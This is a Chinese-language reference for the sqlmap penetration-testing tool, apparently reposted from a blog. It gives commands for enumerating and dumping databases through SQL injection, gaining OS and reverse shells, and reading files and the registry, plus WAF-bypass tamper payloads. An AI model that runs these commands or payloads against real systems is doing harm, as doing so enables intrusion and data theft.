Sqlmap常用参数及说明

Sqlmap 特点

·数据库支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase 和 SAPMaxDB
·SQL注入类型包括SQL盲注、UNION注入、显错式注入、时间盲注、盲推理注入和堆查询注入等技术
·支持枚举用户、密码哈希、权限、角色、数据库、表和列
·支持执行任意命令
·自动识别密码加密方式,并且可以使用字典解密
·支持数据导出功能

使用说明:

注入点:www.xxx.com/user.jsp?id=1

1.判断注入是否存在

sqlmap.py -u "www.xxx.com/user.jsp?id=1"

2.获取数据库(Access数据库不需要获取)

sqlmap.py -u "www.xxx.com/user.jsp?id=1" --dbs

3.查看当前应用程序所用数据库(Access数据库不需要获取)

sqlmap.py -u "www.xxx.com/user.jsp?id=1" --current-db

4.列出指定数据库的所有表

####(-D 后面跟上一步获取到的数据库名字,Access数据库不需要加-D参数)

sqlmap.py -u "www.xxx.com/user.jsp?id=1" --table -D "数据库"

5.读取指定表中的字段名称

sqlmap.py -u "www.xxx.com/user.jsp?id=1" --columns -T "数据表" -D "数据库"

6.读取指定字段内容

sqlmap.py -u "www.xxx.com/user.jspid=1" --dump -C"字段" -T "数据表" -D "数据库"

在读取数据后,Sqlmap会把读取的数据转存到Sqlmap/output/目录下,文件以”Table.cvs”保存。

Sqlmap参数用法

URL 代表要测试的注入点

1.测试注入点权限

sqlmap.py -u "URL" --privileges  //测试所有用户的权限
sqlmap.py -u "URL" --privileges -U sa  //测试sa用户权限

2.执行Shell命令

sqlmap.py -u "URL" --os-cmd="net user"  //执行 net user 命令
sqlmap.py -u "URL" --os-shell  //系统交互的shell

3.获取当前数据库名称

sqlmap.py -u "URL" --current-db

4.执行了SQL命令

sqlmap.py -u "URL" --sql-shell  //返回SQL交互的shell,可以执行SQL语句
sqlmap.py -u "URL" --sql-query="sql"

5.POST提交方式

sqlmap.py -u "URL" --data "POST参数"

6.显示详细的等级

sqlmap.py -u "URL" --dbs -v 1

-v 参数包含以下7个等级。

·0:只显示Python的回溯、错误和关键消息;
·1:显示信息和警告信息;
·2:显示调试信息;
·3:有效载荷注入;
·4:显示HTTP请求;
·5:显示HTTP响应头;
·6:显示HTTP响应页面的内容。

7.注入HTTP请求

sqlmap.py -r head.txt --dbs  //head.txt 内容为 HTTP 请求

head.txt 可以为burpsuit抓包获取到的内容

8.直接连接到数据库

sqlmap.py -d"mysql://admin:admin@192.168.1.1:3306/testdb" --dbs

9.注入等级

sqlmap.py -u "URL" --level 3

10.将注入语句插入到指定位置(常用于伪静态注入)

sqlmap.py -u "http://www.xxx.com/id/2*.html" --dbs

11.使用 Sqlmap 插件

sqlmap.py -u "URL" --tamper "space2morehash.py"

Sqlmap Tamper

脚本名:apostrophemask.py
作用:用 utf8 代替引号
例子:
("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
要求:
all

脚本名:equaltolike.py
作用:like 代替等号
例子:
SELECT ·FROM users WHERE id=1
SELECT ·FROM users WHERE id LIKE 1
要求:
·Microsoft SQL Server 2005
·MySQL 4, 5.0 and 5.5

脚本名:space2dash.py
作用:绕过过滤‘=’替换空格字符(”),(’–‘)后跟一个破折号注释,一个随机字符串和一个新行(’n’)
例子:
('1 AND 9227=9227')
'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
要求:
·MSSQL
·SQLite

脚本名:greatest.py
作用:绕过过滤’>’,用GREATEST替换大于号。
例子:
('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
要求:
·MySQL 4, 5.0 and 5.5
·Oracle 10g
·PostgreSQL 8.3, 8.4, 9.0

脚本名:
space2hash.py
作用:空格替换为#号随机字符串以及换行符
例子:
1 AND 9227=9227
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
要求:
·MySQL 4.0, 5.0

脚本名:apostrophenullencode.py
作用:绕过过滤双引号,替换字符和双引号。
例子:
tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
要求:
·MySQL 4, 5.0 and 5.5
·Oracle 10g
·PostgreSQL 8.3, 8.4, 9.0

脚本名:halfversionedmorekeywords.py
作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论
例子:
("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
要求:
·MySQL < 5.1

脚本名:space2morehash.py
作用:空格替换为#号以及更多随机字符串换行符
例子:
1 AND 9227=9227
1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
要求:
·MySQL >= 5.1.13

脚本名:appendnullbyte.py
作用:在有效负荷结束位置加载零字节字符编码
例子:
('1 AND 1=1')
'1 AND 1=1%00'
要求:
·Microsoft Access

脚本名:ifnull2ifisnull.py
作用:绕过对IFNULL 过滤。替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’
例子:
('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'
要求:
·MySQL
·SQLite (possibly)
·SAP MaxDB (possibly)

脚本名:space2mssqlblank.py(mssql)
作用:空格替换为其它空符号
例子:
SELECT id FROM users
SELECT%08id%02FROM%0Fusers
要求:
·Microsoft SQL Server

# ASCII table:
#      SOH           01            start of heading
#      STX          02             start of text
#      ETX          03            end of text
#      EOT          04            end of tra
nsmission
#      ENQ          05            enquiry
#      ACK          06            acknowledge
#      BEL          07            bell
#      BS            08            backspace
#      TAB          09             horizontal tab
#      LF            0A            new line
#      VT            0B            vertical TAB
#      FF            0C            new page
#      CR            0D            carriage return
#      SO            0E            shift out
#      SI            0F            shift in

脚本名:base64encode.py
作用:用base64编码替换
例子:
("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
要求:
all

脚本名:space2mssqlhash.py
作用:替换空格
例子:
('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
要求:
·MSSQL
·MySQL

脚本名:modsecurityversioned.py
作用:过滤空格,包含完整的查询版本注释
例子:
('1 AND 2>1--')
'1 /*!30874AND 2>1*/--'
要求:
·MySQL

脚本名:space2mysqlblank.py
作用:空格替换其它空白符号(mysql)
例子:
SELECT id FROM users
SELECT%0Bid%0BFROM%A0users
要求:
·MySQL

#      TAB          09             horizontal TAB
#      LF            0A            new line
#      FF            0C            new page
#      CR            0D            carriage return
#      VT            0B            vertical TAB            (MySQL  and Microsoft SQL  Server only)
#     -A0           -(MySQL  only)

脚本名:between.py
作用:用between替换大于号(>)
例子:
('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
要求:
·Microsoft SQL Server 2005
·MySQL 4, 5.0 and 5.5
·Oracle 10g
·PostgreSQL 8.3, 8.4, 9.0

脚本名:modsecurityzeroversioned.py
作用:包含了完整的查询与零版本注释
例子:
('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'
要求:
·MySQL

脚本名:space2mysqldash.py
作用:替换空格字符(”)(’–‘)后跟一个破折号注释一个新行(’n’)
注:之前有个mssql的这个是mysql的
例子:
('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
要求:
·MySQL
·MSSQL

脚本名:multiplespaces.py
作用:围绕SQL关键字添加多个空格
例子:
('1 UNION SELECT foobar')
'1        UNION          SELECT      foobar'
要求:
all

脚本名:space2plus.py
作用:用+替换空格
例子:
('SELECT id FROM users')
'SELECT+id+FROM+users'
要求:
all

脚本名:bluecoat.py
作用:代替空格字符后与一个有效的随机空白字符的SQL语句。然后替换=为like
例子:
('SELECT id FROM users where id = 1')
'SELECT%09id FROM users where id LIKE 1'
要求:
·MySQL 5.1, SGOS

脚本名:nonrecursivereplacement.py
作用:双重查询语句。取代predefined SQL关键字with表示suitable for替代(例如.replace(“
SELECT”、”"))filters
例子:
('1 UNION SELECT 2--')
'1 UNIOUNIONN SELESELECTCT 2--'
要求:
all

脚本名:space2randomblank.py
作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集
例子:
('SELECT id FROM users')
'SELECT%0Did%0DFROM%0Ausers'
要求:
all

脚本名:percentage.py
作用:asp允许每个字符前面添加一个%号
例子:
SELECT FIELD FROM TABLE
%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E
要求:
·ASP
·Microsoft SQL Server 2000, 2005
·MySQL 5.1.56, 5.5.11
·PostgreSQL 9.0

脚本名:
sp_password.py
作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾
例子:
('1 AND 9227=9227--')
'1 AND 9227=9227--sp_password'
要求:
·MSSQL

脚本名:chardoubleencode.py 双url编码(不处理以编码的)
例子:
SELECT FIELD FROM%20TABLE
%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%25
4f%254d%2520%2554%2541%2542%254c%2545

脚本名:unionalltounion.py
作用:替换UNION ALL SELECT UNION SELECT
例子:
('-1 UNION ALL SELECT')
'-1 UNION SELECT'
要求:
all

脚本名:charencode.py
作用:url编码
例子:
SELECT FIELD FROM%20TABLE
%53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
要求:
·Microsoft SQL Server 2005
·MySQL 4, 5.0 and 5.5
·Oracle 10g
·PostgreSQL 8.3, 8.4, 9.0
Notes:
·Useful to bypass very weak web application firewalls that do not
url-decode the request before processing it through their ruleset
·The web server will anyway pass the url-decoded version behind,
hence it should work against any DBMS

脚本名:randomcase.py
作用:随机大小写
例子:
INSERT
InsERt
要求:
·Microsoft SQL Server 2005
·MySQL 4, 5.0 and 5.5
·Oracle 10g
·PostgreSQL 8.3, 8.4, 9.0

脚本名:unmagicquotes.py
作用:宽字符绕过
例子:
1'AND 1=1
1%bf%27 AND 1=1–%20
Notes:
Useful  for bypassing  magic_quotes/addslashes  feature

脚本名:randomcomments.py
作用:用/**/分割sql关键字
例子:
‘INSERT’
‘IN//S//ERT’

脚本名:versionedkeywords.py
作用:Encloses  each non-function  keyword with versioned MySQL  comment
例子:
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#
1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/, CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/*!AS**!CHAR*/),CHAR(32)),CHAR(58,100,114,117,58))#
要求:
·MySQL

脚本名:charunicodeencode.py
作用:字符串unicode 编码
例子:
SELECT FIELD%20FROM TABLE
%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045'
要求:
·ASP
·ASP.NET
·Microsoft SQL Server 2000
·Microsoft SQL Server 2005
·MySQL 5.1.56
·PostgreSQL 9.0.3
Notes:
Useful  to bypass weak web application firewalls that do not unicode url-decode  the request before processing  it through their ruleset

脚本名:securesphere.py
作用:追加特制的字符串
例子:
('1 AND 1=1')
"1 AND 1=1 and '0having'='0having'"
要求:
all

脚本名:versionedmorekeywords.py
作用:注释绕过
例子:
1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#
1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#
要求:
·MySQL >= 5.1.13

脚本名:space2comment.py
作用:
Replaces space character (‘‘) with comments ‘/**/’
例子:
SELECT id FROM users
SELECT//id//FROM/**/users
要求:
·Microsoft SQL Server 2005
·MySQL 4, 5.0 and 5.5
·Oracle 10g
·PostgreSQL 8.3, 8.4, 9.0
Notes:
·Useful  to bypass weak and bespoke web application firewalls

脚本名:halfversionedmorekeywords.py
作用:关键字前加注释
例子:
value’ UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa
value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)), NULL, NULL#/*!0AND ‘QDWa’='QDWa
要求:
·MySQL < 5.1

Sqlmap常用参数及说明

-b  获取 banner
-p  指定测试参数
-g  从 Google 中获取URL,-g "inurl:aspx?id="
--gpage=GOOGLEPAGE  指定 Google 页码
--union-check  是否支持 union 注入
--union-cols  union 查询表记录
--union-test  union 语句测试
--union-use  采用 union 注入
--proxy  代理注入
--threads  采用多线程
--user-agent  自定义 user-agent
--referer=REFERER  HTTP referer 头
--proxy=PROXY  使用代理
--string  指定关键词
--tor  创建 tor 的匿名网络
--predict-output  常见的查询输出预测
--keep-alive  使用持久 HTTP(S) 连接
--eval=EVALCODE  使用HTTP参数污染
-a,-all  查询所有
--hostname  主机名
--is-dba  是否是管理员权限
--users  枚举所有的用户
--password  枚举所有的用户密码
--roles  枚举所有的用户角色
--schema  枚举 DBMS 模式
--count  检索所有的条目数
--dump  转存 DBMS 数据库表项目,需要制定字段名称(列名称)
--dump-all  转存 DBMS 数据库所有的表项目
--search  搜索列、表或数据库名称
--exclude-sysdbs  在枚举表时排除系统数据库
--sql-query=query  执行SQL语句
--file-read=RFILE  读取操作
--file--write=WFILE  写入操作
--file--dest=DFILE  绝对路径写入
--reg-read  读取一个 Windows 注册表项值
--reg-add  增加一个Windows 注册表项值数据
--reg-del  删除一个Windows 注册表项值数据
--reg-key=REGKEY  Windows 注册表键
--reg-value=REGVAL  Windows 注册表键值
--reg-data=REGDATA Windows 注册表的键值项数据
--reg-type=REGTYPE  Windows 注册表键的值类型
--dump-format=DUMP  转存数据格式(CSV(default)、HTML或SQLITE)
--hex  使用十六进制数据检索功能
--output-dir=ODIR  自定义输出的目录路径
--update  更新Sqlmap
--purge-output  安全删除所有内容的输出目录
--check-waf  启发式检查 WAF/IPS/IDS 保护
--os-pwn  反弹shell
--cookie=COOKIE  指定 HTTP Cookie,预登录
--random-agent  使用随机选定的User-Agent
--tamper=TAMPER  使用 Sqlmap 插件
--level  测试等级(1-5),默认为 1


原文地址:

  • https://kamisec.github.io/2017/07/Sqlmap%E5%B8%B8%E7%94%A8%E5%8F%82%E6%95%B0%E5%8F%8A%E8%AF%B4%E6%98%8E/


版权声明

除非另有说明,本网站上的内容均根据 Creative Commons Attribution-ShareAlike License 4.0 International (CC BY-SA 4.0) 获得许可。